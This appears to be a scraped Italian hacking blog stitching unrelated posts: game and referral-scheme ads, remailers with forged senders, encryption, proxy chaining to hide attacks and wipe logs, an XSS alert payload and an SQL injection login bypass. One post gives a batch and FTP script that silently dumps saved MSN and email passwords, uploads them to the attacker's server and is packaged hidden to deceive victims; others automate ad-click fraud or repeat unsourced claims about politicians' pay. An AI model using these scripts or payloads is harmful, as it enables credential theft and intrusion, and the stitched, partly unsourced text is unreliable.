Isylea è un gioco fantasy on-line multiutente che permette, calandosi nei panni di un personaggio, di vivere all’interno di una vasta ambientazione fantasy-medievale in costante evoluzione, soprattuto grazie alle azioni dei giocatori stessi, che svolgono una parte attiva all’interno della storia.

Benché si possa identificare come un discendente dei MUD (Multi User Dungeon), Isylea unisce alla tradizionale interfaccia a comandi testuali una curata interfaccia grafica che permette un’interazione con il gioco più piacevole ed intuitiva. Si offre inoltre spazio a svariate tipologie di interpretazione e ruoli, svincolando il gioco dagli schemi tradizionali di dungeons e combattimenti.

La solida ambientazione unita al clima full-gdr, offrono una varietà di spunti e situazioni di gioco potenzialmente infinita.

Mediante l’utilizzo di meccaniche è possibile produrre qualsiasi cosa (dal costruire case al generare veleni mescolando erbe, a esplorare monti, mari, fiumi ed isole navigandoci con imbarcazioni magari costruite da voi, a ricercare incantesimi, a inventare stili di combattimento, guidare i propri compagni in battaglia, o perfino confrontare la calligrafia di uno scritto che si sta leggendo…).

Sì può generare qualsiasi personaggio, poiché il sistema è ad abilità e non a classi e vederlo interagire con centinaia di altri in un mondo in costante mutamento ed evoluzione.

Vi sono differenti razze: Umani, Dryma, Goblin, Elfi, Nani, Golem e Orchi.

Ciascuna razza possiede un proprio dominio di conoscenze, usi e costumi; ha una storia, una religione, si tramanda miti e leggende.

Per interpretare al meglio il proprio personaggio è necessario leggere accuratamente le informazioni di ambientazione rese disponibili per la propria razza.

Per permettere ad ogni giocatore di avere una visione d’insieme e scegliere la razza a lui più congeniale, sono comunque accessibili informazioni d’ambientazione riguardanti tutte le razze giocabili, sebbene le informazioni disponibili nelle sotto-sezioni di ciascuna razza rappresentano una conoscenza comune solo ai personaggi di quella razza.

Il gioco è fruibile su ogni piattaforma, poichè server e client sono stati sviluppati in Java

Sito Ufficiale -> www.isylea.it

Licenza : Freeware

Guadagnare non facendo niente o quasi

Foto del Pagamento ricevuto in data 18/03

Sono qui per farvi ricredere e illustrarvi un metodo veloce e pratico per guadagnare un 63,00 $ al mese facendo quasi nulla!

Inizio subito col dire che non è uno di quei servizi che hanno la fregatura ed è tutto gratis e legale.

Lo uso da più di un mesetto e mi ci sto mantenendo i miei account premium su megaupload e Rapidshare tenendo semplicemente aperto un browser Firefox minimizzato mentre faccio tutt’altro.

Con questo metodo potrai comprarti un account premium di qualsiasi filehoster o semplicemente potrai guadagnare soldi da spendere, ad esempio, su Ebay.

E non solo se mi aggiugente a MSN, vi spiego anche il metodo per guadagnare 10 $ per ogni inscritto che portate a bux.to

Mail MSN -> morgen[AT]paranoici.org

Un esempio di guadagno potrebbe essere con 10 click ads per giorno = $0.10 con 20 referrals che cliccano 10 ads per giorno = $2.00 guadagno giornaliero = $2.10 guadagno settimanale = $14.70 guadagno mensile = $63.00, questo è solo un esempio le cui entità possono variare in base al numero di referral e dei click.

Segui questi semplici punti per iniziare a guadagnare:

Per prima cosa devi avere Firefox!

1) Salta questo punto se hai già un account AlertPay
altrimenti vai su AlertPay ed iscriviti.
Crea un account Personal Pro (Gratis), validando poi l’account.

2) Adesso Clicca Qui e iscriviti clikkando su Join now and receive a $0.05 Sign-up Bonus, lasciandomi come vostro refer non solo riceverete $0.04 in più, ma riceverete più link giornalieri da clikkare in quanto io sono un utente Premium.

Verrai pagato solamente per cliccare sui link.
Più sponsor visiterai più soldi guadagnerai!

Guadagnerai semplicemente visitando dei siti per 30 secondi a visita. Verrai pagato $0.01 per ogni visita e $0.01 per ogni visita di un tuo referral. Puoi far iscrivere quanta gente vuoi sotto di te e quindi guadagnare di più! I pagamenti vengono effettuati via PayPal solitamente in 24-48 ore. Per ricevere un pagamento devi guadagnare almeno $10.3) Rendilo automatizzato (Lascia Firefox aperto e guadagna!)

3) Installa queste due aggiunte su Firefox ReloadEvery
GreaseMonkey
Chiudi e riapri Firefox per completare l’installazione

4) Adesso, vai su bux e clicca su Surf Ads

Clicca ora con il destro nella pagina > Aggiorna Ogni > Abilita
Clicca nuovamente con il destro > Aggiorna Ogni > Imposta
Inserisci 1 minuto e 30 secondi
(Questo significa che la pagina si aggiornerà ogni minuto e 30 secondi)

5) Adesso, installa questo file
http://www.megaupload.com/?d=IWMSYRC8
(Greasemonkey ti chiederà di installare il file, clicca su “Installa”)

6) Torna su bux e clicca su Surf Ads
Lascia aperta la pagina e fai lavorare gli scripts installati nei punti precedenti che ogni minuto e 30 secondi ricaricheranno la pagina, e se ci saranno nuovi sponsor, verranno automaticamente cliccati facendoti guadagnare!

7) Usa i soldi guadagnati per comprarti un account Premium per MegaUpload.com o per Rapidshare.com o li spendi suy Ebay!

Buon guadagno & Buon Download…

Se hai domande o hai bisogno di aiuto per impostare firefox o qualcos’altro non esitare a contattarmi.
Questa società non perde soldi, anzi ne guadagna molti di più di noi che clicchiamo.

E’ inoltre possibile trasferire i soldi su carta prepagata Postepay, per poi ritirarli dallo sportello Postale

Recensione completa Bux -> QUI!

morgen[AT]paranoici.org -> Aggiungetemi su MSN per qualsiasi problema

Gli Anonymous Remailer o Remailer Anonimi, sono dei server di posta che consentono di scambiare messaggi e-mail senza che si possa scoprire il mittente originale, permettendo così di comunicare liberamente senza ritorsione alcuna, purtroppo ci sono ancora paesi che non consentono la libertà di espressione, un esempio la Cina.

Questi server non tengono log di nessun genere, non memorizzano IP e permettono di cambiare l’header del messaggio con un altro header falso.

Molti remailer prendono carico solo le mail criptate in PGP, quindi per poterli utilizzare bisogna avere la chiave pubblica del remailer, di solito è possibile reperirla scrivendo una mail vuota con oggetto “remailer-key”.

Se vogliamo inviare una mail a tizio@provider.it, usando un remailer, dobbiamo far precedere il tutto da un’intestazione come questa:

****************************************************

::
Anon-To: tizio@provider.it

Il messaggio… bla bla bla…

*****************************************************
Ricordatevi una riga vuota e i due punti all’inizio, la riga Anon-To contiene il destinatario finale del messaggio e-mail, adesso si deve criptare il tutto con la remailer-key.

Il messaggio crittato deve a sua volta avere un intestazione come questa:

***************************************************************

From: linus@tolvalds.com
To: anon@remailer.org
::
Encrypted: PGP

****************************************************************

La prima riga è il falso mittente della mail, la seconda è l’indirizzo del remailer anonimo, ricordatevi i due punti e la digitura Encrypted: PGP.

Il risultato finale dovrebbe essere simile a questo:

****************************************************************

From: linus@tolvalds.com
To: anon@remailer.org
::
Encrypted: PGP

—–BEGIN PGP MESSAGE—–
Version: 3.0.1i

cSHT4zCbQmtlbzGFM9T0jSD7QVvEzaPcUlBSSWHQclbnR9YWJNp5BFSLdR9s
owE1jMsNwjAUBH3gZMk9PClnUoBPUANpwElW2OBPZD8H0gd1UCP2gduuNDNfj
—–END PGP MESSAGE—–
****************************************************************

Non appena il remailer riceverà la vostra mail la decritterà e la invierà a destinazione, oppure è possibile inviare la mail ad un altro remailer, ricordando di crittarla con la sua chiave pubblica, concatenando più remailer si ha una maggiore sicurezza.

Tuttavia i remailer non sono affidabili al 100%, è possibile che un messaggio venga perso, quindi è consigliabile spedirne più copie.

Vi segnalo portale italiano, www.autistici.org, che oltre al remailer anonimo, offre tanti servizi, utilissimi per la privacy:

• Account e-mail anonimi tipo tuonome@autistici.org ecc…( non analizzano la posta ai fini di pubblicità, diversamente da gmail.com)

• Mailing-list anonime

• Spazio Web e Piattaforme Blog

Il tutto gratuitamente, senza fini di lucro, il progetto vive di sole donazioni da parte degli utenti, quindi una donazione conviene sempre farla!

Policy del Network Autistici - Inventati

GnuPG (Gnu Privacy Guard) o anche GPG è un software Open Source, compatibile con il famoso sistema di crittografia PGP, è sviluppato dalla Free Software Foundation.

Compatibile con tutti i sistemi operativi e con molti programmi OpenSource, il livello di robustezza raggiunto è tale, che nemmeno i “potenti” servizi segreti Americani sono riusciti a decrifrarlo.

E’ possibile utilizzarlo per crittare le nostre mail utilizzando il comunissimo client Thunderbird, tramite un plug-in scritto ad hoc, dal nome EnigMail.

Tutto questo è dovuto per il crescente bisogno di comunicare in modo sicuro e semplice, senza che terzi, possano reperire le nostre informazioni confidenziali scambiate.

GnuPG permette di nascondere, dietro a una serie di simboli e caratteri stampabili, delle informazioni o messaggi decodificabili solo dal destinatario finale e dal suo mittente, quindi anche se il messaggio viene intercettato, non sarà possibile carpirne il contenuto.

Ciò è possibile poichè si usa una cifratura a chiave asimmetrica, cioè mittente e destinatario dispongono di una identica chiave di codifica e un’altra per la decodifica.

Ogni utente dispone di una chiave pubblica e di una chiave privata, la prima può essere diffusa senza alcun problema, serve appunto alla codifica del messaggio; la seconda chiave privata, è protetta da una passphrase (un intera frase), questa chiave viene usata per la decodifica e garantisce dunque che sia solamente il destinatario a leggere le informazioni contenute nel messaggio.

La chiave pubblica può essere inviata tramite posta elettronica oppure può essere inviata a dei KeyServer, dei server “magazzino” usati per scambiarsi la chiave pubblica, senza bisogno di inviarla ogni volta.

Tutto ciò può sembrare astruso e complicato da realizzare, ma è tutto svolto autonomamente dai programmi.

Due consigli: quando generate le chiavi, usate una passphrase abbastanza complicata e scegliete una chiave di grosse dimensioni 4096 bit.

Analizziamo un attacco della tipologia “Code Injection“, il Cross Site Scripting o “XSS”.

Con la tecnica XSS, possiamo attaccare sia un portale dinamico che un sito statico, il tutto si basa sull’iniezione di codice che devia il normale comportamento della piattaforma, praticamente bisogna far girare degli Script Malevoli nel sito direttamente dal browser.

Osserviamo un esempio, ecco il codice di una pagina vulnerabile:

<html>
<head>
<title>Sito Vulnerabile Cross Site Scripting “XSS”</title>
<script type=”text/javascript”>
function prova() {
var ins=prompt(”Inserisci un numero…”);
return prova;
</script>
</head>
<body>
<script type=”text/javascript”>
insert=prova();
document.write(”Il numero che hai inserito è “,insert);
</script>
</body>
</html>

Questa pagina html, contiene un piccolo JavaScript, il cui compito è quello di stampare a video, il numero che abbiamo precedentemente inserito, ad un utente smaliziato salta subito all’occhio che il codice non ha controlli, inserendo una parola tra due apici “Ciao bello”, il codice della pagina muterà in

document.write("Il numero che hai inserito è ","Ciao Bello");

così facendo abbiamo mutato il valore della variabile, fin qui niente di pericoloso, e se invece inseriamo del codice Javascript esempio:

<script>alert("Questo sito è Vulnerabile!!!")</script>

Facile, il codice sorgente muterà ancora, il risultato sarà la comparsa di una finestrella Alert con scritto “Questo sito è Vulnerabile!!!” .

Bene, per chi conosce il javascript è un gioco da ragazzi far girare qualsiasi script, pensiamo ad un cookie grabber, ovvero il furto dei cookie.

Una vulnerabilità così semplice, che spesso viene ignorata dagli Admin può portare a gravi conseguenze, si può facilmente arrivare anche al pieno controllo del portale.

La libertà di informazione e la conoscenza della verità sono i valori portanti di ogni Hacker, oggi voglio scrivere di un progetto che incorpora questi ideali.

Il progetto in questione è Freenet 0.7, il software è disponibile per tutti i sistemi operativi: Windows, Linux e Mac.

Freenet è una rete peer-to-peer ideata e svilupata per ragioni di anonimato e sicurezza , priva di server centrali, ossia decentralizzata, proprio per evitare attacchi e censure.

Freenet nasce per il diritto di libertà, che è un principio indiscusso, che oggi non sempre viene rispettato.

Il progetto mira ad impedire a organi governativi o qualsiasi altra organizzazione di scoprire cosa l’utente sta facendo sulla rete, rende inoltre impossibile determinare e tracciare sia i Nodi (utenti) di Freenet che i dati che viaggiano nella rete.

L’utente stesso non sa quali file o informazioni risiedono nel suo nodo, per ovvi motivi.

Freenet sfrutta la banda e lo spazio su disco dei suoi utenti, quindi un peers (nodo) ha la doppia funzione di Client/Server, tutto ciò permette la pubblicazione e la circolazione di qualsiasi tipo di informazione.

Freenet è una “rete dentro la rete”, ove è possibile:

• Pubblicare siti web nel completo anonimato

• Comunicare attraverso forum, instant messaging e chat, e-mail

• Distribuire vari tipi di file

Sito Ufficiale Progetto -> http://freenetproject.org/

Wiki Italiano ->FreenetZeroPuntoSette

Circa tre mesi fa è partito il progetto Evilsentinel, un sistema di sicurezza universale per applicazioni web in php, sviluppato dal programmatore Evilsocket.

Essendo un progetto universale può essere installato su tutti i CMS: Joomla, Php-Nuke, PHP-Fusion, Wordress ecc…

Nella sua release attuale la 1.0.2 Public è in grado di filtrare, bloccare e notificare all’ amministratore del sito molti tipi di attacchi:

• Scanning/crawling di software come Acunetix o simili, utilizzati per velocizzare la rilevazione di falle di sicurezza.

• Cross site scriptings o XSS.

• SQL Injection.

• Remote file inclusions o RFI.

• Local file inclusions o LFI.

• Admin privileges escalations.

E’ stata sviluppata la tecnologia AIT,(adaptive ip tracking) che permette all’admin di seguire le mosse dell’attaccante sul suo sito in tempo reale o di guardarsi i log ordinati per ip, data, ora e pagina con comodità in un secondo momento.

Scarica Evilsentinel 1.0.2 -> QUI!

Sito Ufficiale Progetto -> QUI!

Circa un mese fa un gruppo hacker dal nome OSX89 è riuscito ad hackerare Mac OS X permettendo di farlo girare su un comune PC.

Il Sistema Operativo Crackato è reperibile sui famosissimi motori di ricerca di file torrent.

E’ stato pubblicato una sorta di tutorial di installazione, che in sole tre fasi permette di installare il tutto perfettamente.

Dai test effettuati si denota che Mac su un PC gira meglio che su di un Apple a parità di  hardware.

Tutto questo è grandioso tranne per il fatto che è illegale, Apple consente l’uso di Mac solamente su hardware autoprodotto.

Non volendo infrangere la legge non ho installato Mac, ma ho solamente imitato il dekstop.

L’immagine sottostante è il mio attuale desktop di Windows XP, un ingrandimento QUI!

Esistono dei software che consentono di modificare l’aspetto di Windows XP imitando l’interfaccia grafica di Mac, ma tuttavia appesantiscono il sistema, un esempio è FlyakiteOSX.

Non volendo dare ulteriori problemi a Windows che già ne ha troppi, ho preferito solamente installare la RocketDock, la barra animata in basso che mi ha permesso di eliminare le icone sul desktop incorporandole a essa.

In seguito ho spostato la barra di Windows in alto, non è visibile perchè è impostata su “Nascondi Automatico” e per finire ho messo lo sfondo adatto con quella stupenda X.

Ho anche provato il cubo rotante 3D, il software dal nome DeskSpace è possibile utilizzarlo per 14 giorni in versione Trial.

Molto utile avere otto desktop anche su Win ma destabilizzava tutto il sistema e ho proceduto a rimuoverlo.

Scarica Wallpaper Leopard -> QUI!

Il mio primo post sul phreaking o anche “hacking del telefono“, per i curiosi consiglio di visitare la pagina disponibile su wikipedia qui.

Girovagando per il web, alla ricerca d’informazioni sulla città sicula Gela, mi imbatto in un forum cittadino.

Casualmente leggo di un programmatore che ha sviluppato un software SMS7 che permette di inviare gratuitamente SMS verso Vodafone utilizzando un servizio messo a disposizione dalla stessa compagnia telefonica.

Scarico il software e inizio a provarlo, invio decine di sms alla mia ragazza cliente Vodafone facendola addirittura imbestialire.

Il software si dimostra molto facile ed intuitivo, comprende anche una rubrica, ma per utilizzarla è necessario registrare la copia del programma, prelevando il codice dal forum di supporto previa registrazione gratuita.

Il software è disponibile per tutte le piattaforme Microsoft quali: Windows 98SE, ME, NT4.0, 2000, XP, 2003 e Vista.

Il produttore assicura anche un utlizzo con Linux tramite il software di emulazione Wine.

UPDATE

SMS7 cambia nome in XMS7, è stato implementato l’invio degli MMS, poichè Vodafone ha disattivato gli SMS gratis.

Download XMS7 2.1.0 -> QUI!

Sono stato chiamato anch’io a questo meme da Paso, l’ultimo meme a cui ho partecipato è stato “Servizi 2.0 che uso“.

Non li trovo tanto piacevoli difatti ho commentato il post di no1globe con un “noooooooooooo!” ripetuto.

» Chi o cosa ti ha spinto a creare un blog?
Inizialmente non avevo intenzione di aprire un blog ma avevo bisogno di un posto dove appuntare le cose che facevo e le cose interessanti che trovavo sul web, allora ho incominciato a scrivere i miei appunti su dei fogli di testo; successivamente ho riflettuto sulla possibilità di rendere pubblici i miei appunti e allora la decisione di aprire un blog e l’idea di rielaborare gli appunti in how-to, post-tecnici e divulgativi.

Sono molto contento di averlo fatto dato il successo che ho riscontrato, 136.000 visite in soli 5 mesi dall’apertura del blog.

» Il tuo primo post?
Non ho incominciato con un post sui miei propositi, ma iniziando con un post sul mondo hacker come il “Jargon File“, subito dopo seguendo con due post etici ho voluto dichiarare la mia posizione e gli argomenti che avrei affrontato quali ICT Security & Hacking etico.

» Il post di cui ti vergogni di più?
Non saprei proprio, diciamo che mi vergogno di tutti i post ove faccio errori di grammatica e sintattica per la fretta o per mia ingnoranza.

» Il post di cui sei più fiero?
E’ una scelta difficile perchè sono fiero di tutto il mio blog, potrei scegliere i post con più visite giornaliere:

Come rubare password di MSN e di una casella email da remoto con MessenPass e Mail Pass view;
Guida Trojan: Subseven 2.2 il controllo remoto nascosto alla portata di tutti;
Come trovare password di una casella mail;

secondo il mio modesto parere questi post non sono migliori di altri perchè molto richiesti ma tutt’altro, ritengo una guida alla programmazione molto più utile.

Ecco i link ad alcuni post a mio avviso costruttivi:

Un linguaggio dinamico impariamo il php (Corso di php);
La programmazione visuale: il visual basic (Corso di Visual Basic);
Guida Programmazione: Un linguaggio compilato il C++ (Guida Tutorial).

Per concludere questo meme passo la palla a qualunque blogger legga questo post e ovviamente a tutto il mio blogroll.

Girovagavo tra i feeds e percaso mi son trovato davanti al post “Quanto sei nerd?” di Paso, spinto dalla curiosità ho subito iniziato a rispondere alle domande dei test.

I miei risultati li vedete nelle due immagini sottostanti, vi incito a svolgere i test! Reputo divertente scoprire l’esito e poi decidere se tirarsela o vergognarsi!

Chi si ricorda dei programmini “MessePass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB?

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”, il file eseguibile di WinRar, un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l’output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l’output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l’username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye //chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni!

E’ tutto alla prossima!

Qualche settimana fà è stato approvato all’unanimità e senza astenuti, l’aumento dello stipendio dei parlamentari di circa 1.135 euro al mese.
La mozione è stata camuffata in modo da non apparire nei verbali ufficiali.
Ecco i dati realivi alle agevolazioni spaventse dei parlamentari, la fonte dei dati relativi agli stipendi è www.thevoicemagazine.it, da dove sono stati estrapolati i numeri:
Stipendio dei parlamentari: 19.150 euro
Portaborse: 4.030 ( in genre familiari e parenti)
Rimborso spese di affitto: 2900
Idennità di carica: circa 6000 euro
Tutto questo ESENTASSE!!!!!
Inoltre hanno diritto a:Telefono cellulare GRATIS
Tessera del cinema
Tessera Teatro
Tessera mezzi publici ( dubito ne usino, chi sa a chi le regaleranno)
Francobolli
Viaggi aerei nazionali
Circolazione su strade e autostrade
Piscine e palestre
Treni
Aerei di stato
Ambasciate
Cliniche
Assicurazione infortuni
Assicurazione decesso
Auto blu con autista
RISTORANTI ATTENZIONE
I parlamentari mangiano a sbafo a nostro carico e solo nel 1999 ci sono costati ben 1.472.000 euro!!
I parlamentari hanno diritto alla pensione dopo 35 mesi di carica mentre noi comuni mortali lavoratori dopo 35 anni di servizio.
Durante le elezioni, incassano ben 103.000 euro, in violazione con la legge sul finanziamento dei partiti.
In pratica la sola camera dei deputati ci costa ben 2.215 euro al MINUTO.
E’ uno schifo, una vergogna, un furto ai danni di noi cittadini che manteniamo questa classe politica di fannulloni e sfruttatori, invece di rubarci soldi e creare danno al nostro paese portandoci un danno di oltre UN MILIARDO E DUECENTO MILIONI DI EURO.
Mentre si parla di 20.000 euro l’anno di sipendio per impiegati statali, che dovrebbero rappresentarci e fare i nostri interessi, c’è gente alla quale vengono detratte fior di tasse dallo stipendio a volte che non superano i mille euro al mese.
Si parla di precariato, di legge Biagi e di un tasso di disoccupazione coperto da falsi posti di lavoro che grazie a loro aumentano di giorno in giorno, mentre le grandi aziende cresciute e diventate grandi proprio grazie ai lavoratori messi poi alla porta senza un soldo di liquidazione, senza una parola come è successo alla Vodafone che ha messo alla porta 915 dipendenti per modo di dire co.co.co.
Ogni giorno famiglie devono vedersela con uno stipendio solo, tra tasse accise, bolli e controbolli per permetteri ai parlamentari di fare la vita da ricchi alle nostre spalle.
Si sta promuovendo un referendu per ablire i privilegi TUTTI i parlamentari, fate girare questo file PDF dove si spiega il tutto, e per una volta facciamo girare una mail vera che può cambiare le cose e rendere giustizia a chi ogni mattina presto si alza per guadagnare un decimo di quello che i parlamentari alla nostra faccia ci RUBANO.
I mass media per ovvie ragioni non hanno potuto diffondere questa informazioni, ma la popolazione internet che ancora ha libertà di parola può cambiare le cose, il potere non è in mano a 4 parlamentarti ( si fa per dire purtroppo) ma a noi cittadini.
Scarica qui il pdf e diffondilo tramite posta, stampalo, inseriscilo nel tuo blog.

Fonte -> http://www.alessiomiglio.it

Antifurto Portatile gratis

Notebook Guard è un sistema antifurto software studiato per recuperare un eventuale portatile o PC rubato.

Nasce per un esigenza personale, ma successivamente ho deciso di trasformarlo in un servizio pubblico.

Come funziona?

Notebook Guard dopo una piccola installazione è pienamente operativo senza bisogno di configurazione alcuna.

Il sistema viene configurato in partenza ad hoc per ogni utente, questo evita qualsiasi malfunzionamento generato da configurazioni sbagliate.

Notebook Guard, ad ogni connessione in modo silente e del tutto invisibile, comunica con il centro di controllo, che registra l’indirizzo del PC.

In caso di furto, voi non dovrete far altro che comunicarmelo, vi invierò l’indirizzo del vostro PC non appena il ladro si collega ad internet e potrete andare a sporgere denuncia procedendo al recupero dello stesso.

L’utente viene seguito passo passo, dall’installazione al collaudo, a verifica di funzionamento effettuata… addio preoccupazioni!

Insomma Notebook Guard è la vostra polizza di assicurazione furto per il vostro portatile al costo che decidete voi!

Infatti è rilasciato sotto una licenza DONATIONWARE, cioè è possibile decidere se e quanto denaro donare per l’utilizzo del software.

Il software può essere usato su un solo PC! Per l’utilizzo su più macchine è necessario ordinare un’altra copia del software.

Il sito ufficiale -> http://notebookguard.altervista.org

La legge Levi-Prodi mette a tacere il popolo di Internet
Proposta gia approvata dal consiglio dei ministri ma non ancora approvato dal parlamento:

a legge Levi-Prodi prevede che chiunque abbia un blog o un sito debba registrarlo al ROC, un registro dell’Autorità delle Comunicazioni, produrre dei certificati, pagare un bollo, anche se fa informazione senza fini di lucro.

In questo modo per poter avere uno spazio web si dovrà avere il beneplacito del ROC…. continua a leggere QUI!

LA LIBERTA’ DI INFORMAZIONE DEVE ESSERE ALLA PORTATA DI TUTTI!

Se non volete dichiaravi prigionieri politici, firmate la petizione!

Negli ultimi tempi la nostra privacy non viene più rispettata ed è sempre più soggetta ad invasioni, se siamo oggetto di intercettazioni come far circolare delle informazioni strettamente riservate online senza farsi scoprire?

Viene in nostro soccorso la Steganografia, altro non è che la pratica di nascondere informazioni sensibili o interi file “top secret” in una comunissima immagine.

Le immagini contenenti le informazioni “pericolose” possono liberamente circolare sulla rete in chiaro, via email, pubblicate su un sito web, senza la paura di una possibile intercettazione perchè il file è nascosto nell’immagine e non può essere visto se non analizzando la stessa.

Vi chiederete, “come può avvenire questo processo?” Ebbene il concetto è semplicissimo, mettiamo il caso di avere un immagine GIF come successione di codici binari del tipo: I0010III II00I00I 0I0III0I I0III0I0 000III0I II0I0I0I I00000I0 000III00 00II0I0I ecc…

Ogni codice corrisponde ad un punto determinato dell’immagine, alterando la parte più a destra del codice binario si ha un cambiamendo minimo della colorazione, avendo un messaggio da nascondere, si andrà a sostituire il suo codice binario in modo parziale ad ogni codice dell’immagine, questo altererà si il colore ma in modo impercettibile dall’occhio dell’uomo, rendendo così possibile l’incorporamento dell’informazione al suo interno.

Questo metodo come tale ha un grosso problema, le informazioni che viaggiano nell’immagine sono in chiaro, quindi con una scansione della stessa è possibile risalire all’informazione contenuta, quindi una possibile soluzione è quella di criptare l’informazione con un robusto algoritmo di cifratura, in questo modo anche se l’immagine viene ispezionata non è possibile risalire al messaggio perchè criptato.

Diversi consigli che posso darvi sono quelli di non usare password brevi o legati alla persona per la codifica, non utilizzare immagini presenti del web in più copie, perchè analizzando l’immagine originale con la vostra il messaggio in essa contenuto si evidenzia da solo e per ultimo ma non per importanza, le informazioni contenute in un immagine possono essere solo 1/8 della dimensione dell’immagine altrimenti si avrebbe un alterazione dei colori molto evidente rendendo vano il nostro camuffamento.

Un software FREEWARE che ci permette di fare steganografia con immagini e anche file audio è S-TOOLS, questo software utilizza il metodo del trascinamento dei file e dei robusti algoritmi per la cifratura delle informazioni.

Scarica la versione 4 da QUI!

Per effettuare un attacco hacker sulla rete internet è necessario adottare alcuni accorgimenti, si deve evitare che la vittima possa risalire alla fonte dell’attacco, i motivi sono abbastanza ovvi, uno dei quali è quello di non ritrovarsi la Guardia di Finanza sotto il portone di casa.

E’ d’obbligo precisare che l’anonimato totale non esiste, ma possiamo ricorrere a degli “strumenti” che ci assicurano un grado di anonimizzazione pari al 95%.

Il nostro “tallone d’Achille” è l’indirizzo IP che il nostro ISP(Fornitore Connessione) assegna in modo univoco alla nostra macchina una volta connessi alla rete internet.

Attaccare una qualsiasi applicazione web senza alcuna “maschera” è da veri e propri sprovveduti, è d’obbligo utilizzare dei “filtri” che fanno da tramite tra noi e la vittima, in modo tale che quando la vittima tenta di risalire all’attaccante, ritroverebbe solamente l’indirizzo IP del “filtro”.

PROXY

I proxy sono server di appoggio che permettono agli utilizzatori di collegarsi a loro per poter navigare senza che il proprio indirizzo IP venga loggato.

Se ad esempio un utente volesse navigare sul sito di www.google.it in modo anonimo dovrebbe digitare http://ip-del-proxy.www.google.it:80, ip-del-proxy sta per l’indirizzo del server anonimo, e 80 sta per il numero della porta utilizzata da tale server proxy, in questo modo il browser dell’utente fa richiesta al proxy di reperire per suo conto le pagine di google.

Esiste una possibilità di una concatenazione di proxy per una maggiore sicurezza, cioè utilizzare due o più proxy di seguito, ad esempio:

ATTACCANTE -> PROXY1 -> PROXY 2 -> PROXY 3 -> VITTIMA

In questo modo il browser comunicherà con il primo proxy che farà richiesta al secondo che successivamente farà richiesta al terzo che si collegherà alla vittima.

La sicurezza è notevolmente aumentata perchè anche se la vittima riuscisse a farsi rivelare l’IP dal 3^ proxy server, avremmo gli altri due a nascoderci, da sottolineare che però in questo modo si ha un calo di velocità inverosimile!

SOCKS

I socks sono dei particolari protocolli che permettono la navigazione anonima utilizzando un firewall interno, la porta di default utilizzata è la numero 1080.
Praticamente il socks non fa altro che far direzionare l’attacco dal firewall, facendo in modo che alla vittima non appaia l’IP.
La vittima cercando l’IP dell’attaccante incontra il socks che trasferisce tutto al firewall.

WINGATE

I wingate consentono una navigazione anonimizzata utilizzando la porta 23, quindi è palese che possiamo utilizzarli per nascoderci quando effettuiamo i nostri attacchi via telnet, protocollo che utilizza proprio la porta 23.

E’ prassi che l’attaccante ad attacco ultimato modifichi i file log sul server vittima per confondere le tracce e elimini i dati di navigazione anche dal proprio PC.

In rete esistono centinaia di portali che pubblicano liste contenenti indirizzi di server proxy, socks e wingate anonimi, dovete però testarli prima di utilizzarli, per accertarvi che siano veramente anonimi.

Oggi parliamo di una tecnica usata dagli Hacker e purtroppo anche da “pirati” la SQL INJECTION, altro non è che un’iniezione di codice in un database MySQL, tramite un attacco di questo tipo, ovvero con stringhe ben congeniate è facilissimo avere l’accesso non autorizzato con pieni poteri Admin su un’applicazione web.

Prendiamo ad esempio una qualsiasi pagina di login, se nel campo “userid” si immette il valore Admin e nel campo “password“ il valore passprova, la nostra query SQL sarà:


SELECT * tabella_utenti
WHERE userid = 'Admin'
AND password = 'passprova'

Questo codice è esatto ma non offre la sicurezza necessaria, proviamo a inserire una stringa ben strutturata, stiamo attenti alla posizione degl’apici, ad esempio nel campo “password” andiamo ad inserire:

1' or '1' = '1

la query risultante è la seguente:

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = '1' OR '1' = '1'

E’ facile notare cosa è successo, la query SQL grazie all’operatore OR imporrà ‘1′ = ‘1′, dato che l’uguaglianza si è verificata ecco che abbiamo l’accesso al pannello amministrativo dell’applicazione web senza conoscere userid e password.

Salve a tutti!

Eccomi, scrivo per avvisarvi del mio ritorno alle cure del blog.

Mi scuso con tutti i lettori per il ritardo nelle risposte, l’ultimo mio post risale al 21 Luglio, era previsto il rientro ad inizio Settembre e invece son qua per avvisarvi che riprenderò a scrivere e ad essere pienamente attivo (almeno spero) dopo la seconda settimana di ottobre.

